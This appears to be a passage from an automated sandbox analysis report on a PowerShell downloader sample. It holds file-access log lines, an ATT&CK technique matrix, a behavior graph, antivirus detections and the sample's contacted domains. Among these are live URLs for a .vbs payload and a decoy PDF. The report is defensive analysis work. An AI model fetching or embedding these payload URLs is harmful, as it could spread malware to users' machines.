      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578224 Sample: 8iAcoQLc3o.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 3 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49723, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49718 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 23 9->15         started        18 Acrobat.exe 20 74 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 109 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      8iAcoQLc3o.ps142%VirustotalBrowse
      8iAcoQLc3o.ps137%ReversingLabsScript-PowerShell.Downloader.Boxter
      8iAcoQLc3o.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.p0%Avira URL Cloudsafe
      http://crl.microsoftA0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		high
          www.bluemaxxlaser.com
          		203.175.174.69
          		truefalse
            		high
            x1.i.lencr.org
            		unknown
            		unknownfalse
              		high
              www.astenterprises.com.pk
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1578438045.0000028A5EAB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1578438045.0000028A5E975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpfalse
